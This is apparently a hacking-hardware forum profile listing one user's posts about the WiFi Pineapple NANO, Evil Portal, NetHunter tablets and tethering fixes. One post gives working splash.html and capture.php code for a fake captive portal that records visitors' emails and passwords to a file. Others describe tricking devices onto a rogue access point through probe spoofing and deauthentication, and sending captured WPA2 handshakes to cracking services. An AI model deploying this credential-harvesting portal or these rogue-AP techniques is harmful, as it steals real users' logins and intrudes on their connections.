Jump to content

jermzz

Active Members
  • Posts

    102
  • Joined

  • Last visited

Posts posted by jermzz

  1. It's literally the main topic within the Evil Portal support thread for the NANO so there really isn't much searching to be done.

    The issue is not a firmware issue but a nodogsplash issue. It seems it won't allow the splash.html page to access anything via $imagesdir anymore and I haven't been successful in getting it to access /www. Everything worked fine on the MKV because that was a different version of nodogsplash. Evil Portal is currently being rewritten without nodogsplash so these problems go away. If you find a way to access /www from your splash.html page on the NANO you might want to share it with everyone in the Evil Portal thread.

    It's really picky about what commands and how you can access files in /www. Still dunno why this script works, but I can't directly access any pages. I can't even find the nodogsplash config file, its just… not there.. heh.

  2. code tag totally wasn't working right from my phone earlier...

    here's the js / php I was using with evil portal, it uses POST to push username and pass to capture.php and then redir to authtarget. It's not perfect, it makes a nodogsplash token error, but it saves the userdata and authorizes clients to internet. I was gonna fix the error, but I saw that newbie was revamping, so I just stopped using it. Basically I got frustrated I couldn't get anything to work and just took his markV demo portal and built off it to get it to do what I wanted.... Anyway, you'll need to make a stored.txt in /www since the php appends to the file, or it won't work.

    in splash.html

    <script type="text/javascript">
     
    function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi,    
        function(m,key,value) {
          vars[key] = value;
        });
        return vars;
      }
    
    
    var fvalsubmit = getUrlVars()["valsubmit"];
    if (fvalsubmit == 1) {
      window.location = "$authtarget";
    
    }
    
    
        function submitTextToCapture() {
     
          textuser = document.getElementById("userText").value;
          textpswd = document.getElementById("userPass").value;
          text="username-" + textuser + "-password-" + textpswd;	
     
    
          window.location = "http://172.16.42.1/capture.php?text=" + text + "&redir=$authtarget&valsubmit=1";
     
        }
     
      </script>
    
    
     <form id="textForm">
      <p align="center">                                                                                           
       <div style="font-weight:bold;">Enter Username and Password<br>
       <div align="center">
        <input type="text" id="userText" placeholder="Enter your Email" required>
      <input type="password" id="userPass" placeholder="Enter a Password" required><br>
        <button type="button" id="button" onclick="submitTextToCapture()">
        <b>Connect</b></button>
       </div>
      </p>
     </form>
    
    

    capture.php

    <?php
    
    
    $text = $_GET["text"];
    $redir = $_GET["redir"];
    
    $file = fopen("stored.txt", "a");
    fwrite($file, $text . "\n");
    fclose($file);
    
    echo '<script type="text/javascript">window.location = "' . $redir . '"</script>';
    
    ?>
    
    
    • Upvote 1
  3. 1 nexus 7 2013 wifi / nethunter 3.0

    2 5.0.1

    3 LRX22C I believe.

    4 yes

    5 yes

    6 yes

    iPhone 6 for hotspot to nexus when mobile / determining IP address of nano.

    Kali 2.0 Linux live USB booted from MacBook Pro.

    Msi GS70 partitioned for Kali 2.0

    Also have used with my nexus 7 2012 running 4.4.4. But I don't use it cause the 2013 is way faster.

  4. Check your 5.1.1 build for me and let me know what build your using maybe your using a different 5.1.1 build then I had when I had 5.1.1

    Here's some shots. Showing pineapple connected and showing it has Internet via update page. A second screen showing build and Kernal, and a third showing its all running on Kali. And all I did was use the wifi pineapple connector app.

    4FDA69D6-736F-4FAF-81F3-BFE75DE8934D.jpg

    14711226-B03B-41B0-969C-D2D50C237F1E.jpg

    2643C96D-07AD-4EA2-ACE0-8E0A738F0362.jpg

    So now you tell me if it's a hak5 issue or a user issue?

    EDIT: I'm currently on 5.0.1 for another reason, but it works the same on 5.1.1

  5. The app works fine with your device but not with a nexus 7 2013 tablet just yet. Which is misleading the box clearly says; Requirements: Smartphone or Tablet well I guess that leaves out the Nexus 7 2013 tablet because the app doesn't even work with Android 5.1.1 you can at least enable tethering but the app doesn't take you anywhere after enabling tethering.

    My video is to warn people who might not have any other nexus device other than a Nexus 7 2013 Had If I would've known the app didn't work with a Nexus 7 2013 tablet I might would've held off buying the NANO.

    It does work in 5.1.1. Click the app, enable tethering, pineapple has Internet. How does it not work? I've done it no less than 3 dozen times now.
  6. Just upgraded to 6.0.1 on a Nexus 6, Connector app works flawlessly (as it did on 5.0.1).

    Here is an MP4 I made while testing a screen recording app, works quickly and effortlessly.

    Are you sure you have it plugged in correctly with the correct cable, Zarabyte?

    Do you run nethunter on your nexus 6? I'm already tired of either using my hotspot on my iPhone (primary phone) or tethering to my nexus 7. I want to get either a nexus 5 or 6 and put it on my att mobile share plan.

    If so, how does nethunter run with it? Well? How annoying is it using shell on a smaller screen day to day? I wish I could get my hands on both and play with them. I know my 2012 and 2013 nexus 7's are days apart on speed when running nethunter. Especially metasploit.

  7. Anyone had any luck getting the WiFi Pineapple Connector App working on a Nexus 7 2013 WiFi tablet running 5.1.1 build number LMY48M

    I enabled tethering pressed the back button it still says Tethering Disabled You must first configure USB Tethering clicked the CONFIGURE shows USB tethering is tethered but the app doesn't go to figuring the nano.

    Assuming that you're trying to tether your wifi.... (And it's not a mobile connected tablet)

    This is a known bug they're working on fixing. I have the same problem and I have the same tablet as you. I've tried multiple flavors of kitkat lollipop and marshmallow with the same problem.

    The temporary work around is to connect to the management interface with a separate device and ssh to the nano and run ifconfig. You'll see the 192.168.x.x ip that the nano is running on. Then on the nexus just go to that ip on the nano port and it should work. The tethering works, just have to figure out what IP the nano is being given from the tablet. I tether mine from the hotspot of my iPhone because it's the only way I can get Internet to the nano on the go.

  8. perfect! thanks a lot for the explaination, now it's all clear! :)

    PS: do i have to connect my "pineAP laptop" to the free-wifi too and redirect the traffic through the pineAP or can i also use the 3G connection from my android-phone and redirect it to my pineAP? i mean in order to perform what u just said can i use another "internet source" like 3g connection or i just have to use the free-wifi AP traffic?

    There's a wifi pineapple app in the android store to tether your pineapple to the Internet through your android phone. You can use your laptop as well if it's running Linux by using the wp6.sh. Windows I hear it's harder to connect. Another way to do it is use a USB dongle on the back of the pineapple and under the network tab you can connect to a hotspot or any wifi with client mode with wlan2.
    • Upvote 1
  9. Oh well now it's clear :) so if i go, for example, into my college where there is a Free-Wifi i could turn on the pineap as you said, configuring the internet connection sharing and it will automatically say to the devices nearby "hey i am Free-Wifi Access Point" tricking and connecting them to it rather than the real Free-Wifi AP, right?

    Not exactly. PineAP will broadcast open SSIDs of any nearby device the pineapple can see. But if that device has never connected to a free-wifi, PineAP will not associate it. When you connect to a free wifi with your phone, tablet or computer, once you've left the covered area of that AP your device will always probe for that wifi. And it will automatically connect when it's in range. PineAP simply sniffs those probes and says "I'm this AP, connect to me!" And you will get clients that way.

    So at your college, if you connect to the free wifi, you're still only going to get clients that are not already associated to an AP, AND that are probing for formerly connected APs. Other than that it's just a 50/50 which AP they connect to if they're the same SSID.

    Theoretically, if you name your AP the same SSID as an access point, and deauth them, they will connect to you if your signal out powers the other AP. I've not had much luck doing this with the nano in its stock configuration and antennas though. But I haven't tried so much. Maybe someone else can chime in if they've had success.

    • Upvote 1
  10. The purpose of pineap is to catch people that have connected to open networks in the past, starbuks, crap like that. I don't think you'll be able to see the client's that connect to the open pineapple network.

    I see all clients connected to the open wifi regardless of method. Only time I don't see clients is if connected via management.

  11. I've a Nexus 7 2013 and it runs nethunter with zero issues.....

    Do you have an adapter connected to it running in monitor mode? I can't for the life of me get one to work. On a side note, it took me over a week just to get nethunter installed. Apparently there was a big batch of n7 2013s that were sold at fry's and a couple other places that shipped with 5.0.1 and had slightly different hardware. (Don't remember exactly what it was a while ago) anyway I had one of those and I couldn't get twrp installed, it wouldn't mount the filesystem. Someone modified and made a multirom version of twrp that worked with these specific models, which I have. That may have something to do with all the problems I have.

    Last night I tried to install marshmallow and Kali 3.0. But had to drop down to lollipop Kali 3.0 because it took away USB tether and I couldn't use my nano.

    But anyway, I can't get an adapter to work with it and I have several. I just get dmesg errors and no interface, even though it shows up with lsusb. I know I'm not doing anything wrong cause it works with my 2012 nexus, that thing is slow as heck though. I've read it's an otg issue.

  12. My issue with nethunter is that on the newer nexus 7 2013 wifi, they dont support otg, so no wifite or similar. Similarly I have an older nexus 7 running 4.4.4 and it often crashes using monitor mode and reboots itself. The devices are good for a portable linux alternative to carrying a laptop, but I need to carry my nano to do any wireless auditing. too many devices sitting in my pockets / bag I feel like.

  13. Okay, I'm not sure if I am missing something with configuring my nano.

    I can only connect to it while my phone is on WiFi and tethered to my phone. I checked my phone and USB tethering works to my laptop.

    I have another WiFi card plugged in to my nano and planned on hot spotting from my phone since I can't seem to get USB tethering working.

    I tried connecting to the management network of my nano and I still get the proxy error.

    What am I missing? Should I reset my nano and start over?

    I really want to get this working but there is some issue.

    Oh, I'm using chrome on my phone if that helps or is an issue.

    I don't understand what you're trying to do. You want the nano to work on your laptop, or your phone? You only need a 3rd card if you're not tethering. But if you've done the initial setup of the nano and set a management ssid and password, you should be able to connect to the nano interface via that ssid over wifi with no internet at all at 172.16.42.1:1471
  14. Does anyone have some experience using these services? I currently have a wpa2 cap file on onlinehashcrack but I see in a quick search there's many places that offer this service. Trying to see which ones people use most and what your success rates have been. I have some tables setup on a drive, but nothing extensive as these service claim to be able to crack.

    Thanks in advance for any input.

×
×
  • Create New...